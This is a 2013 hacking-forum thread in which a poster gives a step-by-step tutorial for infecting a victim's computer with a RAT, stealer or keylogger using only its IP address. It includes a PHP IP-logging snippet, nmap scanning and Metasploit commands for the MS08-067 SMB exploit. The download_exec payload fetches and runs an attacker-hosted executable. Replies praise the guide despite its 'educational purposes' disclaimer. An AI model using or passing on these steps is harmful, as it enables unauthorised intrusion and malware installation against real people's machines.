Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


Infect I.P (Metasploit)

  • 0 Vote(s) - 0 Average


10-05-2013, 11:34 PM #1
BrianKamikaze Offline ------ ***
Registered
Posts:121 Threads:11 Joined:Sep 2013 Reputation: 0
Mood: None
USING THIS TUTORIAL YOU CAN PUT YOUR RAT, STEALER, KEYLOGGER, DDOSER IN YOUR VICTMS COMPUTER USING "ONLY" IP ADRESS AND FOLLOWING "MINE" TUTORIAL :angel: !!!!


THIS TUTORIAL IS WRITTEN IN EDUCATIONAL PURPOSES ONLY!! AND I "Brian Kamikaze" AM NOT RESPONSIBLE FOR ANYTHING YOU DO FOLLOWING IT, AND I DONT RECOMMEND YOU TO USE THIS ON OTHER PEOPLES COMPUTER, ITS WRITTEN ONLY TO USE ON YOUR "OWN" COMPUTER!! Tonguesmiley



IN THIS TUTORIAL WE NEED :


1.NMAP [ Download Here ]
2.MetaSploit [ Download Here]
___________________________________________-
1. First we need to find victms IP.
2. Script for stealing IP adress or Other Tools for Get victims IP :

Code:
$file = "ip.txt";
$ip = $_SERVER['REMOTE_ADDR'];
$handle = fopen($file, 'a');
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");
fclose($handle);
?>


2. Now we need to create database.
We open metasploit and type 'db_create' (this will create database)
If you created database before, than its enough to type 'db_connect' ...

3. Now we scan victms IP
So in metasploit type 'Nmap'

Next command is 'nmap -sT -sV ' (in '' we type victms IP without '<>')
When scanning is done, we will have detailed description victms computer...

If we get something like this Windows 2000 (all versions XP SP1, SP2, SP3, SP4) We can without problem do the attack..
4. Exploit

In console we type 'use windows/smb/ms08_067_netapi'
(This will select windows/smb/ms08_067_netapi)

Now type 'set target 0'
Than type 'show payloads'
Than 'set payload / download_exec'

Than type 'Show options'
You will se enough of options, fill only RHOST i URL.


Type: set RHOST

Than type 'set URL http://www.site.com/xxx.exe' ('http://www.site.com/ -should be your site , a 'xxx.exe' is name of your RAT, stealer, virus what is uploaded on your site)
(http://www.fileave.com , http://www.zymic.com)
AT the end we type 'exploit'



Biggrinsmiley Biggrinsmiley Cool

[Image: qXShBci.png]
http://www.zone-h.org/archive/notifier=Brian Kamikaze
http://hack-db.com/hacker/Brian Kamikaze/all.html

[Image: 72kk.png]

10-06-2013, 01:27 AM #2
rajat Offline Respected *****
Respected
Posts:39 Threads:0 Joined:Nov 2012 Reputation: 0
Mood: None
gud tut mate but I need to bookmark it bcoz msf always irritates me -_-

10-06-2013, 01:51 PM #3
BrianKamikaze Offline ------ ***
Registered
Posts:121 Threads:11 Joined:Sep 2013 Reputation: 0
Mood: None
hahahaha ok Biggrinsmiley

[Image: qXShBci.png]
http://www.zone-h.org/archive/notifier=Brian Kamikaze
http://hack-db.com/hacker/Brian Kamikaze/all.html

[Image: 72kk.png]

10-06-2013, 03:33 PM #4
TJKUSKO Offline w00w00'Paranoic *****
MaDLeeTs LoVer
Posts:160 Threads:7 Joined:Sep 2013 Reputation: 0
Mood: None
good tut bro i'll try.. just change font yellow collor please ;x

They must know who we are and what we can do!

[Image: 97a9e4d5bb35.jpg]

10-07-2013, 06:26 PM #5
BrianKamikaze Offline ------ ***
Registered
Posts:121 Threads:11 Joined:Sep 2013 Reputation: 0
Mood: None
(10-06-2013, 03:33 PM)TJKUSKO Wrote:  good tut bro i'll try.. just change font yellow collor please ;x
hahahaha ok Biggrinsmiley

[Image: qXShBci.png]
http://www.zone-h.org/archive/notifier=Brian Kamikaze
http://hack-db.com/hacker/Brian Kamikaze/all.html

[Image: 72kk.png]

10-16-2013, 12:33 AM #6
Sn!p3r_GS Offline Super Moderator ******
Super Moderators
Posts:354 Threads:19 Joined:May 2013 Reputation: 1
Mood: Relaxed
it's not always work , cauz u need that ur victim have the vulnerable port for the attack
u can do a lot of different attack (all os) ...

Love & Respect to : Zombie_Ksa-H4x0rL1f3-Shadow008-b0x-1337-Invectus-??dcodE-DeXter -MakMan-MindCracker-Sniffer

04-27-2017, 01:29 AM #7
BrianKamikaze Offline ------ ***
Registered
Posts:121 Threads:11 Joined:Sep 2013 Reputation: 0
Mood: None
(10-16-2013, 12:33 AM)Sn!p3r_GS Wrote:  it's not always work , cauz u need that ur victim have the vulnerable port for the attack
u can do a lot of different attack (all os) ...

we must check the open port too brooooo  Clapping Clapping

[Image: qXShBci.png]
http://www.zone-h.org/archive/notifier=Brian Kamikaze
http://hack-db.com/hacker/Brian Kamikaze/all.html

[Image: 72kk.png]






Forum Jump:


Users browsing this thread:1 Guest(s)